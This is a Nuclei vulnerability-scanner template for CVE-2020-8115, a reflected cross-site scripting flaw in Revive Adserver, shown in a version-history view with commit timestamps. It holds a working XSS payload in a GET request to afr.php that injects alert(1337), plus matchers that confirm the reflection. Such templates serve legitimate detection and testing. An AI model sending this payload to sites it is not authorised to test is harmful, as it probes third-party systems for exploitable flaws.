nuclei-templates/cves/CVE-2020-8115.yaml

20 lines
384 B
YAML
Raw Normal View History

2020-04-08 11:27:13 +00:00
id: CVE-2020-8115
info:
name: Revive Adserver XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
2020-04-09 13:02:30 +00:00
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
2020-04-08 11:27:13 +00:00
matchers:
- type: status
status:
- 200
2020-04-08 13:21:47 +00:00
- type: word
2020-04-08 13:25:45 +00:00
words:
- "alert(1337)"
2020-04-08 11:27:13 +00:00
part: body